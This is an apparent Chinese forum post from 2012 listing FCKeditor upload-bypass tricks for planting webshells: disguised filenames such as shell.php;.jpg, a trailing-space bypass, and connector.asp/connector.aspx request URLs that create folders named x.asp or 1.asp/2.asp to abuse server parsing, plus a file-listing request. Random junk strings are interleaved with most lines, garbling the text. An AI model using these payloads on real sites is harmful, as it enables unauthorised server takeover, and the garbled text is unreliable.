很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg
5 W& i# g; q- |& y2 Q6 ~; s4 j5 r; g6 k
提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shell.php+空格 是 2 个不同的文件,未测试。4 V; q8 {. v' {+ @: s
" i; ]$ A0 A7 ]9 \/ h( l
继续上传同名文件可变为 shell.php;(1).jpg,也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。* A! @5 G' N( O( ]! I: z
' [5 x1 s6 @6 {8 E% `6 M Z# A2 Y
突破建立文件夹:
* h! G$ I2 R7 L7 ]: r, @$ u' m4 F: \3 C) }2 |5 a7 U
editor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp1 |$ s9 F( A7 N# c5 d" X" r
# S: C! w0 c' G
参数:' r7 w; W+ A1 H, d, s! g2 j1 U
) H3 O( W) ~' m5 [8 x
当前目录名:CurrentFolder=/qing.asp2 h- `$ L0 t8 L
0 s: F j p' A: i6 w+ ?+ q) y新的目录名:NewFolderName=x.asp: f8 O/ }; Q4 d$ S$ @$ F
+ S, T% U, F ~* ]7 _
其实很简单,在目录那里写 x.asp,然后点击新建目录在弹出来的对话框中随便写……2 d+ v, i' a( w
( X( g# e+ m! \那么 x.asp 就已经建立生成了,此方法百试百灵!7 n) a" P1 C" c2 X
6 ^9 ?$ k- N w/ h& ]( P" A
新建文件夹参数 x.asp,基本都能搞定。) z1 P8 Z- G6 s' R
4 V3 N, K# R% m+ _/ u! z2 `- u
下面这句话是要在1.asp下建立2.asp,当不存在1.asp时会先创建,只过滤了目标目录的创建 而没有过滤不存在目录的创建6 E7 d% F% P A. s2 g, g
. `. l1 L2 h' L9 T( l+ J# I) daspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2F1.asp&NewFolderName=2.asp+ e' k3 w# f- @6 \
. J3 W% S5 g' p( _ H* D: C! Z4 j
获取文件列表8 ~- n% l ^3 F9 `! x: ~ a7 m# a3 @
aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
+ l& I* \( x& M/ l" Y
3 r" S1 o! I0 s1 \" t# S |
发表于 2012-12-31 09:27:09
收藏
支持
反对